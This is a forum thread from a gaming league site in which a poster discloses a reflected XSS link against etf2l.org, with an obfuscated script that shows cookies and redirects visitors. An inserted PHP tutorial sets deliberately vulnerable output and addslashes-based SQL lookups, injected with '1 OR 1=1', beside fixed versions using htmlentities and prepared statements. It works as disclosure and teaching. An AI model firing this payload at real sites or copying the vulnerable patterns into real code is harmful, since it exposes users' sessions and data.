

htmlentities is your friend, addslashes and stripslashes are not

Created 1st November 2010 @ 18:57


http://etf2l.org/search/%22%3Cscript%3Ealert(document.cookie);eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,121,111,117,102,97,105,108,46,111,114,103,34));%3C/script%3E/

Also the search function is broken.

Umpteenth time I come across something like this on etf2l (XSS on team pages, country flags, recruitment posts, SQL-injection vulnerabilities on the RSS feed, forum tracker, video browser, etc).

Stuff goes in -> Sanitize for SQL-injections (time to look into prepared statements?)
Stuff comes out -> Check for HTML and JS

This isn’t rocket science.


Last edited by d1ck j0nes,
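The two rules from the post above, written out as an added PHP example; this is not ETF2L's code (none of the site's PHP appears in this thread). It shows a search page that reflects the query into HTML and a team lookup by id, each in a vulnerable form next to its fixed form. The search term is the poster's own payload, percent-decoded from the URL (its String.fromCharCode(...) argument spells out document.location="http://www.youfail.org"). The teams table, its rows and the "1 OR 1=1" id are constructed for the demo, and the lookup runs against an in-memory SQLite database through PDO so the script works offline.

```php
<?php
// Added example, not ETF2L code. The two rules from the post:
//   stuff goes in   -> parameterised queries, not addslashes()
//   stuff comes out -> HTML-encode with htmlentities()/htmlspecialchars()
declare(strict_types=1);

// ---- Stuff comes out: a search page reflecting the query into HTML ----

// The path segment from the poster's URL, percent-decoded into the raw term.
$payload = rawurldecode('%22%3Cscript%3Ealert(document.cookie);eval(String.fromCharCode('
    . '100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,'
    . '58,47,47,119,119,119,46,121,111,117,102,97,105,108,46,111,114,103,34));%3C/script%3E');

// Vulnerable: the raw term is dropped into the markup, so the <script>
// runs in the browser of anyone who follows the link.
function render_search_vuln(string $q): string
{
    return "<h1>Results for $q</h1>";
}

// Fixed: encode at output time for the HTML context. ENT_QUOTES covers both
// quote characters, so the same call is also safe inside attribute values.
// htmlspecialchars() with the same arguments is enough here; htmlentities()
// additionally encodes every character that has a named entity.
function render_search_safe(string $q): string
{
    return '<h1>Results for ' . htmlentities($q, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// stripslashes() is not an output encoder: it only undoes addslashes(), and
// this payload contains no backslashes, so it passes through untouched.
$unchanged = (stripslashes($payload) === $payload);

// ---- Stuff goes in: a team lookup against a constructed SQLite table ----

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE teams (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$db->exec("INSERT INTO teams (name) VALUES ('Toucan Ambassadors'), ('DUCS'), ('FB')");

// Vulnerable: addslashes() escapes only ' " \ and NUL. In an unquoted numeric
// context there is nothing for it to escape, so the attacker's text becomes
// part of the WHERE clause as-is.
function find_team_vuln(PDO $db, string $id): array
{
    $sql = 'SELECT name FROM teams WHERE id = ' . addslashes($id);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed: the statement text is sent once, the value is bound separately and
// cannot alter the statement's structure. SQLite compares the INTEGER column
// against the bound text, which is not a well-formed number, so nothing
// matches. (Rejecting a non-integer id before it gets here is still good
// practice; it is just not what stops the injection.)
function find_team_safe(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT name FROM teams WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$evil = '1 OR 1=1';   // constructed attacker input; addslashes() leaves it unchanged

echo "Vulnerable HTML:\n", render_search_vuln($payload), "\n\n";
echo "Encoded HTML:\n", render_search_safe($payload), "\n\n";
echo 'stripslashes() changed the payload: ', $unchanged ? 'no' : 'yes', "\n\n";
echo 'Vulnerable lookup: ', implode(', ', find_team_vuln($db, $evil)), "\n";
echo 'Prepared lookup:   ', implode(', ', find_team_safe($db, $evil)), "\n";
```

Run it with `php example.php` on any PHP build that ships the pdo_sqlite extension. The addslashes() path is deliberately shown in a numeric context because that is where it fails regardless of database; inside a quoted string literal its usefulness additionally depends on the connection charset and on the database treating a backslash as an escape, which is why the post's answer is prepared statements rather than a better escaping function.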

Admirable

(Toucan Ambassador)

:>

Skyride

DUCS

This man is indeed an utter cock, but he’s right.


Last edited by Skyride,

Arie

(serveme.tf)
FB
[FB]

Community members willing and able to wade through 3 years of PHP WTFs, please rise.

I’ll pass. GL ETF2L, get on it.


Last edited by Arie,
